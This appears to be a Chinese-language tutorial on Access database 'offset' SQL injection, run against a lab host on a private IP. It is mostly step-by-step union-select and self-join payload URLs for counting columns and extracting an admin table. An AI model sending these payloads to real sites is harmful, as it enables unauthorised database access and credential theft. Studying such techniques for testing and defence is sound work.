ACCESS数据库偏移注入

偏移注入主要是针对知道表，但是不知道字段的ACCESS数据库。

比如我们已经知道了表名是 admin

1. 判断字段数：

http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22            返回正常
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23           返回错误

字段数为 22

1. 爆出显示位：

http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

1. 判断表内存在的字段数：

http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin       返回同上图一样得显示位页面
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin   返回错误

说明了admin表下有16个字段。

1. 偏移公式如下：
   order by 出的字段数减去 * 号判断出的字段数，然而再用order by的字段数减去2倍刚才得出来的答案

1.   22-16 = 6 
2.   22-(6*2) = 10
所以答案就是  10

1. 注入公式如下：(爆破内容是随机的)
   一级偏移注入公式：

http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)

此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如：
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)

二级偏移注入公式：

http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)

此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如：
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)

注意：这里是10个字段再减去了表里的6个字段，所以二级偏移这里是select 1,2,3,4

注意：查看源代码有奇效，可能会出现惊喜